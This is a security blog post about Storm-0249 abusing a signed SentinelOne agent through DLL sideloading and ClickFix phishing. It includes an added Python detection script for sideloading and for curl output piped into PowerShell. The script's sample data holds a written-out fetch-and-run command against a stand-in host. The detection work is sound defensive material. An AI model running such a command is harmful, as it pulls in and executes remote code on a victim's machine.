👤 NEONPALADIN
🗓️ 15 Dec 2025  

Security’s Double Agent: How Storm-0249 Turned SentinelOne Against Defenders

Cybercriminals are hijacking trusted security tools to infiltrate networks and sell access to ransomware gangs.

Imagine deploying advanced security tools, only to discover they’ve been weaponized against you. That’s the unsettling reality faced by organizations targeted by Storm-0249, a cunning initial access broker (IAB) who’s rewriting the playbook on cyber infiltration. Their latest trick? Turning SentinelOne’s own security agent into a silent accomplice for ransomware attacks.

A Trojan Horse Inside Your EDR

According to recent research by ReliaQuest and Trend Micro, Storm-0249 has shifted from generic phishing to highly targeted attacks that subvert the very endpoint detection and response (EDR) tools meant to protect organizations. Their scheme hinges on DLL sideloading, a technique where a malicious library is loaded by a legitimate, signed executable - here, SentinelOne’s SentinelAgentWorker.exe.

Here’s how the attack unfolds: Victims receive a phishing email urging them to fix a fabricated technical issue (“ClickFix”). Following the instructions, they unwittingly run a malicious installer with SYSTEM privileges. This installer drops a genuine, digitally signed SentinelOne agent into the user’s AppData folder - right next to a booby-trapped DLL (SentinelAgentCore.dll). When the agent launches, it loads the attacker’s code instead of the real library, all under the guise of routine security operations.

With this cloak of legitimacy, Storm-0249 can establish encrypted command-and-control channels, blending their malicious traffic with trusted EDR telemetry. Defenders monitoring network activity might not spot a thing - after all, it looks like just another day for SentinelOne.

Beyond Sideloading: Fileless Evasion and LoLBins

The attackers don’t stop at DLL sideloading. They abuse so-called “Living off the Land Binaries” (LoLBins) like curl.exe and reg.exe - standard Windows tools rarely flagged by security software. For example, curl.exe is used to fetch malicious scripts that are piped directly into PowerShell memory, bypassing disk-based antivirus scans and leaving hardly a trace.
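The two behaviours described above (the agent binary loading SentinelAgentCore.dll from a user-writable directory, and curl output piped straight into PowerShell) both leave telemetry that is easy to test for. The following detection logic is an added example, not code from the article or from ReliaQuest, Trend Micro or SentinelOne; the install directory, the event record shape and the sample events are constructed assumptions.

```python
import ntpath

# Assumed install location of the genuine agent (constructed for this example).
TRUSTED_AGENT_DIRS = (r"c:\program files\sentinelone",)
AGENT_EXE = "sentinelagentworker.exe"
SIDELOADED_DLL = "sentinelagentcore.dll"

def _norm(path: str) -> str:
    """Normalise a Windows path for case-insensitive comparison (ntpath works off-Windows too)."""
    return ntpath.normpath(path).lower()

def is_sideload(image: str, loaded_dll: str) -> bool:
    """Flag SentinelAgentWorker.exe running outside its install directory while loading
    SentinelAgentCore.dll from that same directory: the sideloading pattern in the article."""
    image_n, dll_n = _norm(image), _norm(loaded_dll)
    if ntpath.basename(image_n) != AGENT_EXE or ntpath.basename(dll_n) != SIDELOADED_DLL:
        return False
    exe_dir = ntpath.dirname(image_n)
    in_install_dir = any(exe_dir.startswith(d) for d in TRUSTED_AGENT_DIRS)
    return not in_install_dir and ntpath.dirname(dll_n) == exe_dir

def is_curl_to_powershell(command_line: str) -> bool:
    """Flag curl output piped directly into a PowerShell host (fileless script download)."""
    left, sep, right = command_line.lower().partition("|")
    return bool(sep) and "curl" in left and any(h in right for h in ("powershell", "pwsh"))

def analyse(events: list) -> list:
    """Run both checks over simplified image-load / process-create records and return alerts."""
    alerts = []
    for ev in events:
        if ev["type"] == "image_load" and is_sideload(ev["image"], ev["dll"]):
            alerts.append(("dll_sideload", ev["image"]))
        elif ev["type"] == "process_create" and is_curl_to_powershell(ev["command_line"]):
            alerts.append(("curl_to_powershell", ev["command_line"]))
    return alerts

# Constructed sample telemetry: one sideload, one benign agent load, one fileless fetch, one benign curl.
SAMPLE_EVENTS = [
    {"type": "image_load", "image": r"C:\Users\alice\AppData\Local\Temp\SentinelAgentWorker.exe",
     "dll": r"C:\Users\alice\AppData\Local\Temp\SentinelAgentCore.dll"},
    {"type": "image_load", "image": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
     "dll": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentCore.dll"},
    {"type": "process_create",
     "command_line": "cmd.exe /c curl.exe -s https://update.example.invalid/fix.ps1 | powershell -nop -"},
    {"type": "process_create", "command_line": "curl.exe -o report.csv https://intranet.example.invalid/report"},
]
```

Running `analyse(SAMPLE_EVENTS)` yields exactly the two malicious records; the agent loading its DLL from the install directory and a plain curl download to disk are left alone.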

Storm-0249 also spins up fake domains mimicking Microsoft URLs, tricking both users and security filters. Their reconnaissance includes extracting unique system identifiers (MachineGuid) to tailor their attacks and increase resale value for ransomware buyers.

Trust Exploited, Not Broken

Crucially, this isn’t a vulnerability in SentinelOne itself. The attackers are abusing the implicit trust in signed, legitimate binaries - turning defenders’ own tools into unwitting allies. It’s a sobering reminder: even the best security software can be weaponized if attackers are clever enough.


NEONPALADIN
Cyber Resilience Engineer